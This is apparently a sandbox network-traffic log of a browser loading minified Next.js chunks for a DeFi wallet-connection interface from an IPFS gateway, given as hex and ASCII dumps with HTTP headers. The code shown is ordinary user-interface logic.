                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 5a 29 28 65 2c 73 2c 6f 5b 73 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6f 29 29 3a 63 28 4f 62 6a 65 63 74 28 6f 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 73 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6f 2c 73 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 72 3d 28 30 2c 6e 2e 5a 50 29 28 64 2e 5a 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b
                                                                                                                                                                                                                                                  Data Ascii: Z)(e,s,o[s])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):c(Object(o)).forEach((function(s){Object.defineProperty(e,s,Object.getOwnPropertyDescriptor(o,s))}))}return e}var r=(0,n.ZP)(d.Z)((function(e){
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6e 20 6c 7d 7d 29 3b 76 61 72 20 61 3d 6f 28 35 39 34 39 39 29 2c 6e 3d 6f 28 38 31 37 31 39 29 2c 64 3d 6f 28 38 35 33 39 30 29 2c 74 3d 6f 28 38 35 38 39 33 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 73 26 26 28 61 3d 61 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 73 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 6f 2e 70 75 73
                                                                                                                                                                                                                                                  Data Ascii: n l}});var a=o(59499),n=o(81719),d=o(85390),t=o(85893);function c(e,s){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);s&&(a=a.filter((function(s){return Object.getOwnPropertyDescriptor(e,s).enumerable}))),o.pus
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6e 20 65 2e 74 72 61 63 6b 45 76 65 6e 74 7d 29 29 3b 72 65 74 75 72 6e 28 30 2c 72 2e 6a 73 78 73 29 28 72 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 72 2e 6a 73 78 29 28 6e 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 67 72 61 64 69 65 6e 74 22 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 69 2e 42 70 2e 43 4f 4e 4e 45 43 54 5f 57 41 4c 4c 45 54 2c 7b 66 75 6e 6e 65 6c 3a 73 7d 29 2c 6f 28 21 30 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 72 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 43 6f 6e 6e 65 63 74 20 77 61 6c 6c 65 74 22 7d 29 7d 29 2c 28 30 2c 72 2e 6a 73 78 29 28 6d 2c 7b 7d 29 5d 7d 29 7d 7d 2c 34 31 30 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 73 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22
                                                                                                                                                                                                                                                  Data Ascii: n e.trackEvent}));return(0,r.jsxs)(r.Fragment,{children:[(0,r.jsx)(n.Z,{variant:"gradient",onClick:function(){d(i.Bp.CONNECT_WALLET,{funnel:s}),o(!0)},children:(0,r.jsx)(a.cC,{id:"Connect wallet"})}),(0,r.jsx)(m,{})]})}},41024:function(e,s,o){"use strict"


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  45192.168.2.549758209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC739OUTGET /_next/static/chunks/7978-570f194bf991f35f.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 12167
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihklklxjia67yzskhqkv6mx7douomv7xrv6fdsmbyojfidcmnyjeq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/7978-570f194bf991f35f.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreihklklxjia67yzskhqkv6mx7douomv7xrv6fdsmbyojfidcmnyjeq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028477
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 62 61 38 31 35 34 33 65 65 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41ba81543ee-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 39 37 38 5d 2c 7b 34 31 30 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 4a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 7d 2c 42 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39 29 2c 6f 3d 72 28 34 37 33 30 29 2c 69 3d 72 28 31 32 37 39 29 2c 61 3d 72 28 32 39 36 33 30 29 2c 63 3d 72 28 38 35 38 39 33 29 2c 73 3d 5b 22 76 61 6c 75 65 22 2c 22 73 79 6d 62 6f 6c 22 2c 22 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 22 2c 22 63 6f 6d 70 61
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7978],{41024:function(e,t,r){r.d(t,{J:function(){return p},B:function(){return b}});var n=r(59499),o=r(4730),i=r(1279),a=r(29630),c=r(85893),s=["value","symbol","visibleDecimals","compa
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 53 22 2c 7b 6d 61 78 69 6d 75 6d 46 72 61 63 74 69 6f 6e 44 69 67 69 74 73 3a 6e 2c 6d 69 6e 69 6d 75 6d 46 72 61 63 74 69 6f 6e 44 69 67 69 74 73 3a 6e 7d 29 2e 66 6f 72 6d 61 74 28 70 29 2c 70 6f 73 74 66 69 78 3a 75 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 76 61 72 20 74 3d 65 2e 76 61 6c 75 65 2c 72 3d 65 2e 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 2c 6e 3d 65 2e 72 6f 75 6e 64 44 6f 77 6e 2c 6f 3d 70 28 7b 76 61 6c 75 65 3a 74 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 72 2c 72 6f 75 6e 64 44 6f 77 6e 3a 6e 7d 29 2c 69 3d 6f 2e 70 72 65 66 69 78 2c 61 3d 6f 2e 70 6f 73 74 66 69 78 3b 72 65 74 75 72 6e 28 30 2c 63 2e 6a 73 78 73 29 28 63 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 69 2c 61 5d 7d 29 7d 66 75 6e
                                                                                                                                                                                                                                                  Data Ascii: S",{maximumFractionDigits:n,minimumFractionDigits:n}).format(p),postfix:u}};function f(e){var t=e.value,r=e.visibleDecimals,n=e.roundDown,o=p({value:t,visibleDecimals:r,roundDown:n}),i=o.prefix,a=o.postfix;return(0,c.jsxs)(c.Fragment,{children:[i,a]})}fun
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 22 75 73 64 22 21 3d 3d 28 6e 75 6c 6c 3d 3d 3d 72 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 72 26 26 28 30 2c 63 2e 6a 73 78 29 28 61 2e 5a 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 73 70 61 6e 22 2c 73 78 3a 7b 6d 6c 3a 2e 35 7d 2c 76 61 72 69 61 6e 74 3a 64 7c 7c 76 2e 76 61 72 69 61 6e 74 2c 63 6f 6c 6f 72 3a 70 7c 7c 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 72 7d 29 5d 7d 29 29 7d 7d 2c 39 32 33 39 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 58 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39
                                                                                                                                                                                                                                                  Data Ascii: "usd"!==(null===r||void 0===r?void 0:r.toLowerCase())&&"undefined"!==typeof r&&(0,c.jsx)(a.Z,{component:"span",sx:{ml:.5},variant:d||v.variant,color:p||"text.secondary",children:r})]}))}},92391:function(e,t,r){r.d(t,{X:function(){return d}});var n=r(59499
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6a 7d 2c 54 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 38 33 36 31 38 29 2c 6f 3d 72 28 35 39 34 39 39 29 2c 69 3d 72 28 34 37 33 30 29 2c 61 3d 72 28 38 39 37 32 32 29 2c 63 3d 72 28 33 30 31 32 30 29 2c 73 3d 72 28 36 30 30 38 32 29 2c 6c 3d 72 28 36 37 32 39 34 29 2c 75 3d 72 28 32 35 30 34 33 29 2c 64 3d 72 28 38 35 38 39 33 29 2c 70 3d 5b 22 73 79 6d 62 6f 6c 22 2c 22 61 54 6f 6b 65 6e 22 5d 2c 66 3d 5b 22 73 79 6d 62 6f 6c 22 2c 22 6c 6f 67 6f 55 52 49 22 5d 2c 62 3d 5b 22 73 79 6d 62 6f 6c 73 22 2c 22 62 61 64 67 65 53 79 6d 62 6f 6c 22 5d 2c 6d 3d 5b 22 73 79 6d 62 6f 6c 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 76 61 72 20 72 3d 4f 62 6a 65
                                                                                                                                                                                                                                                  Data Ascii: on(){return j},T1:function(){return w}});var n=r(83618),o=r(59499),i=r(4730),a=r(89722),c=r(30120),s=r(60082),l=r(67294),u=r(25043),d=r(85893),p=["symbol","aToken"],f=["symbol","logoURI"],b=["symbols","badgeSymbol"],m=["symbol"];function v(e,t){var r=Obje
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 74 65 28 22 68 65 69 67 68 74 22 2c 32 30 36 29 2c 66 7c 7c 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 76 69 65 77 42 6f 78 22 2c 22 30 20 30 20 22 2e 63 6f 6e 63 61 74 28 64 2c 22 20 22 29 2e 63 6f 6e 63 61 74 28 70 29 29 2c 6e 75 6c 6c 3d 3d 3d 28 6c 3d 69 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6c 7c 7c 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 75 29 3b 76 61 72 20 62 3d 28 6e 65 77 20 58 4d 4c 53 65 72 69 61 6c 69 7a 65 72 29 2e 73 65 72 69 61 6c 69 7a 65 54 6f 53 74 72 69 6e 67 28 69 2e 63 75 72 72 65 6e 74 29 3b 72 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 22 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70
                                                                                                                                                                                                                                                  Data Ascii: te("height",206),f||u.setAttribute("viewBox","0 0 ".concat(d," ").concat(p)),null===(l=i.current)||void 0===l||l.appendChild(u);var b=(new XMLSerializer).serializeToString(i.current);r("data:image/svg+xml;base64,".concat(window.btoa(unescape(encodeURIComp
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 7b 69 64 3a 22 47 72 6f 75 70 5f 32 39 31 30 39 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 64 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 69 64 3a 22 53 75 62 74 72 61 63 74 69 6f 6e 5f 31 30 38 22 2c 66 69 6c 6c 3a 22 75 72 6c 28 23 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 29 22 2c 64 3a 22 4d 31 32 38 20 32 35 36 61 31 32 38 2e 39 37 36 20 31 32 38 2e 39 37 36 20 30 20 30 20 31 2d 32 35 2e 38 2d 32 2e 36 20 31 32 37 2e 33 30 39 20 31 32 37 2e 33 30 39 20 30 20 30 20 31 2d 34 35 2e 37 37 2d 31 39 2e 32 36 31 20 31 32 38 2e 33 36 36 20 31 32 38 2e 33 36 36 20 30 20 30 20 31 2d 34 36 2e 33 37 35 2d 35 36 2e 33 31 35 41 31 32 37 2e 33 35 37 20 31 32 37 2e 33 35 37 20 30 20 30 20 31 20 32 2e 36 20 31 35 33 2e 38 61 31 32 39 2e 32 35 31 20 31 32 39 2e 32
                                                                                                                                                                                                                                                  Data Ascii: {id:"Group_29109",children:[(0,d.jsx)("path",{id:"Subtraction_108",fill:"url(#linear-gradient)",d:"M128 256a128.976 128.976 0 0 1-25.8-2.6 127.309 127.309 0 0 1-45.77-19.261 128.366 128.366 0 0 1-46.375-56.315A127.357 127.357 0 0 1 2.6 153.8a129.251 129.2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6f 6e 20 78 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 79 6d 62 6f 6c 2c 72 3d 65 2e 61 54 6f 6b 65 6e 2c 6e 3d 28 30 2c 69 2e 5a 29 28 65 2c 70 29 2c 6f 3d 28 30 2c 6c 2e 75 73 65 53 74 61 74 65 29 28 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 2c 63 3d 6f 5b 30 5d 2c 73 3d 6f 5b 31 5d 3b 72 65 74 75 72 6e 28 30 2c 64 2e 6a 73 78 29 28 61 2e 5a 2c 79 28 79 28 7b 7d 2c 6e 29 2c 7b 7d 2c 7b 73 78 3a 79 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 35 30 25 22 7d 2c 6e 2e 73 78 29 2c 63 68 69 6c 64 72 65 6e 3a 72 3f 28 30 2c 64 2e 6a 73 78 29 28 67 2c 7b 73 79 6d 62 6f 6c 3a 63 7d 29 3a 28 30 2c 64 2e 6a 73 78 29 28 22 69 6d 67 22 2c 7b 73 72 63 3a 22
                                                                                                                                                                                                                                                  Data Ascii: on x(e){var t=e.symbol,r=e.aToken,n=(0,i.Z)(e,p),o=(0,l.useState)(t.toLowerCase()),c=o[0],s=o[1];return(0,d.jsx)(a.Z,y(y({},n),{},{sx:y({display:"flex",position:"relative",borderRadius:"50%"},n.sx),children:r?(0,d.jsx)(g,{symbol:c}):(0,d.jsx)("img",{src:"
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6c 2c 72 3d 28 30 2c 69 2e 5a 29 28 65 2c 6d 29 2c 6f 3d 74 2e 73 70 6c 69 74 28 22 5f 22 29 3b 69 66 28 6f 2e 6c 65 6e 67 74 68 3e 31 29 7b 76 61 72 20 61 3d 28 30 2c 6e 2e 5a 29 28 6f 29 2c 63 3d 61 5b 30 5d 2c 73 3d 61 2e 73 6c 69 63 65 28 31 29 3b 72 65 74 75 72 6e 28 30 2c 64 2e 6a 73 78 29 28 4f 2c 79 28 79 28 7b 7d 2c 72 29 2c 7b 7d 2c 7b 73 79 6d 62 6f 6c 73 3a 73 2c 62 61 64 67 65 53 79 6d 62 6f 6c 3a 22 2f 70 6f 6f 6c 73 2f 22 2b 63 7d 29 29 7d 72 65 74 75 72 6e 28 30 2c 64 2e 6a 73 78 29 28 78 2c 79 28 7b 73 79 6d 62 6f 6c 3a 74 7d 2c 72 29 29 7d 67 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 41 54 6f 6b 65 6e 49 63 6f 6e 22 7d 2c 38 38 37 39 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 54 38 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                  Data Ascii: l,r=(0,i.Z)(e,m),o=t.split("_");if(o.length>1){var a=(0,n.Z)(o),c=a[0],s=a.slice(1);return(0,d.jsx)(O,y(y({},r),{},{symbols:s,badgeSymbol:"/pools/"+c}))}return(0,d.jsx)(x,y({symbol:t},r))}g.displayName="ATokenIcon"},88793:function(e,t,r){r.d(t,{T8:functio
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1280INData Raw: 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 66 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 28 30 2c 6c 2e 7a 29 28 29 2e 75 69 53 74 61 6b 65 44 61 74 61 53 65 72 76 69 63 65 3b 72 65 74 75 72 6e 28 30 2c 69 2e 61 29 28 7b 71 75 65 72 79 46 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 67 65 74 47 65 6e 65 72 61 6c 53 74 61 6b 65 55 49 44 61 74 61 48 75 6d 61 6e 69 7a 65 64 28 65 2c 75 2e 54 38 2c 75 2e 5a 35 29 7d 2c 71 75 65 72 79 4b 65 79 3a 73 2e 42 2e 67 65 6e 65 72 61 6c 53 74 61 6b 65 55 69 44 61 74 61 28 65 2c 75 2e 54 38 2c 75 2e 5a 35 29 2c 72 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 3a 73 2e 67 2c 73 65 6c 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                                                  Data Ascii: yDescriptor(r,t))}))}return e}var f=function(e,t){var r=(0,l.z)().uiStakeDataService;return(0,i.a)({queryFn:function(){return r.getGeneralStakeUIDataHumanized(e,u.T8,u.Z5)},queryKey:s.B.generalStakeUiData(e,u.T8,u.Z5),refetchInterval:s.g,select:function(e


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  46192.168.2.549764209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC739OUTGET /_next/static/chunks/9522.ed3f6cd8a99af04d.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 40104
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreicnjkwtjlypnmlta3gmyg62hze2e5vkzz7iqopkosmocu6bwxqn44"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9522.ed3f6cd8a99af04d.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreicnjkwtjlypnmlta3gmyg62hze2e5vkzz7iqopkosmocu6bwxqn44
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028477
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 62 64 63 64 33 38 63 30 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41bdcd38c0f-EWR
